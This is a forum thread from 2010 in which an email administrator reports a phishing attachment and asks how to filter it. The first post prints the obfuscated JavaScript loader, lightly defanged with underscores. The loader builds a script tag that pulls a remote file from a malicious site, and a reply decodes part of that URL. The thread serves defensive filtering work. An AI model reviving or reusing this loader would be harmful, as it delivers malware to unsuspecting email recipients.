4 Replies Latest reply on Sep 30, 2010 5:12 PM by wecsoc

    e-mail with Obfuscated code


      2 of my users received today an e-mail with a small HTML attachment (72542_attachment.html). It came from a Russian IP ( with a bad reputation and hit an ESP score of 43 and so, was delivered.


      That attachment was a small obfuscated java script and evidently, they tried it.  Lucky for us, the local AV stop it.


      Any idea how to filter out such script in the future? Blocking javscript completely would not be a solution.


      Using a second layer AV gateway, we are filtering some javascript commands but, what would be the impact of blocking all javascript with document.write(?  We allready quarantine javascript with document.write(unescape)



      Here the script with some underline add to disabled it.

      <script type="text/javascript">
      var s="=tdsjqu!tsd>#iuuq;00ufotjpobdbefnz/ofu0jgsbnfgjmf/kt#?=0tdsjqu?";
      m=""; for (i=0; i<s.length; i++) m+=String.fromChar__Code(s.char__CodeAt(i)-1); document.wr_ite(m);
      You must enable JavaScript to see this text.

        • 1. Re: e-mail with Obfuscated code

          I took a brute force approach to this particular spam.  I have some dictionaries that are used for short term purposes.  I de-obfuscated the code and created a new dictionary entry using part of the string that was unlikely to change and unlikely to occur in a legit email.  This isn't a good long-term approach because it's so easy to modify the obfuscation algorithm, but it worked OK short term.

          • 2. Re: e-mail with Obfuscated code

            If I understand you correctly, you de-obfuscated the code, pick a string, and add it to a dictionnary or had to re-obfuscated it before?


            What are you using to de-obfuscated the code?


            Thank you

            • 3. Re: e-mail with Obfuscated code

              I just looked at the script and worked through it manually.  As best I can tell, your example converts each character in the string assigned to variable s to the ASCII character that precedes it.  So the substring iuuq;00ufotjpobdbefnz/ translates to http://tensionacademy.  I put in a dictionary entry that included the iuuq;00 section as well as a bit more.  I had to use the literal substring from the script which is why this isn't a great way to defeat this.  All the spammer has to do is change the algorithm to a 2 or 3 or 4 etc. character offset and it passes right through my dictionary.



              Message was edited by: wecsoc  Unlinked the URL on 9/30/10 5:08:21 PM CDT
              • 4. Re: e-mail with Obfuscated code

                Apparently the unlink function isn't working too well, or I'm using the wrong browser.  I tried to deactivate the hyperlink on the partial URL in my above post, but it's still somewhat live for me.